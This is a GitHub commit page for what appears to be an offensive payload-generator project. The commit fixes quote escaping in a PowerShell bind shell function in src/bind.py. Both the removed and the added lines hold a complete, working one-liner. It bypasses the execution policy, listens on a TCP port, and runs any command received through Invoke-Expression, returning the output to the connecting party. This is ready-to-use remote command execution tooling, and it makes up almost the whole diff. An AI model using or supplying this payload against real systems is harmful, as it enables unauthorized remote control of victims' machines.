Skip to content

Commit

Permalink
Fixing PowerShell bind shell
Browse files Browse the repository at this point in the history 
Quote confusion ...
  • Loading branch information
Andre Marques (zc00l) committed Aug 11, 2018
1 parent 5380156 commit c0b7f97
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion src/bind.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -47,7 +47,7 @@ def BIND_NETCAT_TRADITIONAL_TCP():


def BIND_POWERSHELL_TCP():
return """powershell.exe -nop -ep bypass -Command '$VAR1=PORT;$VAR2=[System.Net.Sockets.TcpListener]$VAR1;$VAR2.Start();$VAR3=$VAR2.AcceptTCPClient();$VAR4=$VAR3.GetStream();[byte[]]$VAR5=0..65535|%{0};$VAR6=([text.encoding]::ASCII).GetBytes(\\"Windows PowerShell running as user \\"+$env:username+\\" on \\"+$env:computername+\\"`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n\\");$VAR4.Write($VAR6,0,$VAR6.Length);$VAR6=([text.encoding]::ASCII).GetBytes(\\"PS \\"+(Get-Location).Path+\\"> \\");$VAR4.Write($VAR6,0,$VAR6.Length);while(($VAR7=$VAR4.Read($VAR5,0,$VAR5.Length)) -ne 0){$VAR8=([text.encoding]::ASCII).GetString($VAR5,0,$VAR7);try{$VAR9=(Invoke-Expression -command $VAR8 2>&1 | Out-String )}catch{Write-Warning \\"Something went wrong with execution of command on the target.\\";Write-Error $_;};$VAR10=$VAR9+ \\"PS \\"+(Get-Location).Path+\\"> \\";$VAR11=($error[0] | Out-String);$error.clear();$VAR10=$VAR10+$VAR11;$VAR6=([text.encoding]::ASCII).GetBytes($VAR10);$VAR4.Write($VAR6,0,$VAR6.Length);$VAR4.Flush();};$VAR3.Close();if($VAR2){$VAR2.Stop();};'"""
return """powershell.exe -nop -ep bypass -Command "$VAR1=PORT;$VAR2=[System.Net.Sockets.TcpListener]$VAR1;$VAR2.Start();$VAR3=$VAR2.AcceptTCPClient();$VAR4=$VAR3.GetStream();[byte[]]$VAR5=0..65535|%{0};$VAR6=([text.encoding]::ASCII).GetBytes('Windows PowerShell running as user '+$env:username+' on '+$env:computername+'`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n');$VAR4.Write($VAR6,0,$VAR6.Length);$VAR6=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$VAR4.Write($VAR6,0,$VAR6.Length);while(($VAR7=$VAR4.Read($VAR5,0,$VAR5.Length)) -ne 0){$VAR8=([text.encoding]::ASCII).GetString($VAR5,0,$VAR7);try{$VAR9=(Invoke-Expression -command $VAR8 2>&1 | Out-String )}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$VAR10=$VAR9+ 'PS '+(Get-Location).Path + '> ';$VAR11=($error[0] | Out-String);$error.clear();$VAR10=$VAR10+$VAR11;$VAR6=([text.encoding]::ASCII).GetBytes($VAR10);$VAR4.Write($VAR6,0,$VAR6.Length);$VAR4.Flush();};$VAR3.Close();if($VAR2){$VAR2.Stop();};" """


# Removed from MetasploitFramework
Expand Down

0 comments on commit c0b7f97

Please sign in to comment.